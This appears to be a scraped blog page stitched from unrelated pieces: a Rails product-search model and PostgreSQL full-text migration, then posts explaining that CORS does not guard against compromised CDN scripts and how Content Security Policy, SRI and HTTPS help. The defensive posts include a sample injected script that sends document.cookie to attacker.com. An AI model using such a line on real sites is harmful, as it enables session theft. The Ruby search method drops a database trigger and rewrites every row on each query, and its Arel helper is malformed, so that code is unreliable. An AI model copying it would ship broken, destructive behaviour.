  # @return [ActiveRecord::Relation] matching products ordered by relevance
  def self.search_in_name_and_desc(query)
    return all if query.blank?

    # Remove any existing tsvector_update_products trigger to prevent recursion
    connection.execute('DROP TRIGGER IF EXISTS tsvector_update_products ON products')

    # Update the searchable column for all records
    Product.find_each do |product|
      product.update_columns(
        searchable: 
          set_weight(to_tsvector('english', product.name || ' '), 'A') ||
          set_weight(to_tsvector('english', product.description || ' '), 'B')
      )
    end

    # Search using the tsvector column
    where("searchable @@ plainto_tsquery('english', :q)", q: query)
      .order("ts_rank(searchable, plainto_tsquery('english', :q)) DESC", q: query)
  end

  # Helper method to set weight for tsvector
  def self.set_weight(vector, weight)
    Arel::Nodes::InfixOperation.new('||', 
      Arel::Nodes::InfixOperation.new('||',
        Arel::Nodes::SqlLiteral.new("setweight("),
        Arel::Nodes::Grouping.new(vector)
      ),
      Arel::Nodes::SqlLiteral.new(",'#{weight}')")
    )
  end
  private_class_method :set_weight
end

Product Migration:

class AddSearchableToProducts < ActiveRecord::Migration[8.0]
  def up
    # Enable necessary extensions
    enable_extension 'pg_trgm' unless extension_enabled?('pg_trgm')
    enable_extension 'unaccent' unless extension_enabled?('unaccent')

    # Add searchable column
    add_column :products, :searchable, :tsvector

    # Create a function to update the searchable column
    execute <<-SQL
      CREATE OR REPLACE FUNCTION products_search_trigger() RETURNS trigger AS $$
      begin
        new.searchable :=
          setweight(to_tsvector('english', coalesce(new.name, '')), 'A') ||
          setweight(to_tsvector('english', coalesce(new.description, '')), 'B');
        return new;
      end
      $$ LANGUAGE plpgsql;
    SQL

    # Create a trigger to update the searchable column
    execute <<-SQL
      CREATE TRIGGER tsvector_update_products
      BEFORE INSERT OR UPDATE ON products
      FOR EACH ROW EXECUTE FUNCTION products_search_trigger();
    SQL

    # Update existing records
    Product.find_each(&:touch)

    # Create GIN index for the searchable column
    add_index :products, :searchable, using: :gin, name: 'gin_idx_products_on_searchable'
  end

  def down
    remove_index :products, name: 'gin_idx_products_on_searchable'
    execute 'DROP TRIGGER IF EXISTS tsvector_update_products ON products'
    execute 'DROP FUNCTION IF EXISTS products_search_trigger()'
    remove_column :products, :searchable
  end
end


Happy Coding!

🌐 Why CORS Doesn’t Protect You from Malicious CDNs (and How to Stay Safe) | Content Security Policy (CSP)

🔍 Introduction

Developers often assume CORS (Cross-Origin Resource Sharing) protects their websites from all cross-origin risks. However, while CORS effectively controls data access via APIs, it does NOT stop risks from external scripts like those served via a CDN (Content Delivery Network).

This blog explains:

  • Why CORS and CDN behave differently
  • Why external scripts can compromise your site
  • Best practices to secure your app

🤔 What Does CORS Actually Do?

CORS is a browser-enforced security mechanism that prevents JavaScript from reading responses from another origin unless explicitly allowed.

Example:

// Your site: https://example.com
fetch('https://api.example2.com/data') // blocked unless API sets CORS headers

If api.example2.com does not send:

Access-Control-Allow-Origin: https://example.com

The browser blocks the response.

Why?

To prevent cross-site data theft.


🧐 Why CDN Scripts Load Without CORS?

When you include a script via <script> or CSS via <link>:

<script src="https://cdn.com/lib.js"></script>
<link rel="stylesheet" href="https://cdn.com/styles.css" />

These resources are fetched and executed without CORS checks because:

  • They are treated as subresources, not API data.
  • The browser doesn’t expose raw content to JavaScript; it just executes it.

⚠️ But Here’s the Risk:

The included script runs with full privileges in your page context!

  • Can modify DOM
  • Access non-HttpOnly cookies
  • Exfiltrate data to a malicious server

💯 Real-World Attack Scenarios

  1. Compromised CDN:
    If https://cdn.com/lib.js is hacked, every site using it is compromised.
  2. Man-in-the-Middle Attack:
    If CDN uses HTTP instead of HTTPS, an attacker can inject malicious code.

Example Attack:

// Injected malicious script in compromised CDN
fetch('https://attacker.com/steal', {
  method: 'POST',
  body: JSON.stringify({ cookies: document.cookie })
});


🧐 Why CORS Doesn’t Help Here

  • CORS only applies to fetch/XHR made by your JavaScript.
  • A <script> tag is not subject to CORS; the browser assumes you trust that script.

❓How to Secure Your Site

1. Always Use HTTPS

Avoid HTTP CDN URLs. Example:
https://cdn.jsdelivr.net/...
http://cdn.jsdelivr.net/...

2. Use Subresource Integrity (SRI)

Ensure the script hasn’t been tampered with:

<script src="https://cdn.com/lib.js"
        integrity="sha384-abc123xyz"
        crossorigin="anonymous"></script>

If the hash doesn’t match, the browser blocks it.

3. Self-Host Critical Scripts

Host important libraries locally instead of depending on external CDNs.

4. Set Content Security Policy (CSP)

Restrict allowed script sources:

Content-Security-Policy: script-src 'self' https://cdn.com;


Diagram: Why CORS ≠ CDN Protection

Conclusion

  • CORS protects API calls, not scripts.
  • External scripts are powerful and dangerous if compromised.
  • Use HTTPS, SRI, CSP, and self-hosting for maximum safety.

🔐 Content Security Policy (CSP) – The Complete Guide for Web Security

🔍 Introduction

Even if you secure your API with CORS and validate CDN scripts with SRI, there’s still a risk of inline scripts, XSS (Cross-Site Scripting), and malicious script injections. That’s where Content Security Policy (CSP) comes in.

CSP is a powerful HTTP header that tells the browser which resources are allowed to load and execute.

🧐 Why CSP?

  • Blocks inline scripts and unauthorized external resources.
  • Reduces XSS attacks by whitelisting script origins.
  • Adds an extra layer beyond CORS and HTTPS.

How CSP Works

The server sends a Content-Security-Policy header, defining allowed resource sources.

Example:

Content-Security-Policy: script-src 'self' https://cdn.example.com;

This means:

  • Only load scripts from current origin (self) and cdn.example.com.
  • Block everything else.

Common CSP Directives

DirectivePurpose
default-srcDefault policy for all resources
script-srcAllowed sources for JavaScript
style-srcAllowed CSS sources
img-srcAllowed image sources
font-srcFonts sources
connect-srcAllowed AJAX/WebSocket endpoints

Example 1: Strict CSP for Rails App

In Rails, set CSP in config/initializers/content_security_policy.rb:

Rails.application.config.content_security_policy do |policy|
  policy.default_src :self
  policy.script_src :self, 'https://cdn.jsdelivr.net'
  policy.style_src  :self, 'https://cdn.jsdelivr.net'
  policy.img_src    :self, :data
  policy.connect_src :self, 'https://api.example.com'
end

Enable CSP in response headers:

Rails.application.config.content_security_policy_report_only = false

Example 2: CSP in React + Vite App

If deploying via Nginx, add in nginx.conf:

add_header Content-Security-Policy "default-src 'self'; script-src 'self' https://cdn.jsdelivr.net; style-src 'self' https://cdn.jsdelivr.net; connect-src 'self' https://api.example.com";

For Netlify or Vercel, add in _headers file:

/*
  Content-Security-Policy: default-src 'self'; script-src 'self' https://cdn.jsdelivr.net; style-src 'self' https://cdn.jsdelivr.net; connect-src 'self' https://api.example.com


✋ Prevent Inline Script Issues

By default, CSP blocks inline scripts. To allow, you can:

  • Use hash-based CSP:
Content-Security-Policy: script-src 'self' 'sha256-AbCdEf...';

  • Or nonce-based CSP (preferred for dynamic scripts):
Content-Security-Policy: script-src 'self' 'nonce-abc123';

Add nonce dynamically in Rails views:

<script nonce="<%= content_security_policy_nonce %>">alert('Safe');</script>

CSP Reporting

Enable Report-Only mode first:

Content-Security-Policy-Report-Only: script-src 'self'; report-uri /csp-violation-report

This logs violations without blocking, so you can test before enforcement.

Visual Overview

Conclusion

CSP + HTTPS + SRI = Strong Defense Against XSS and Injection Attacks.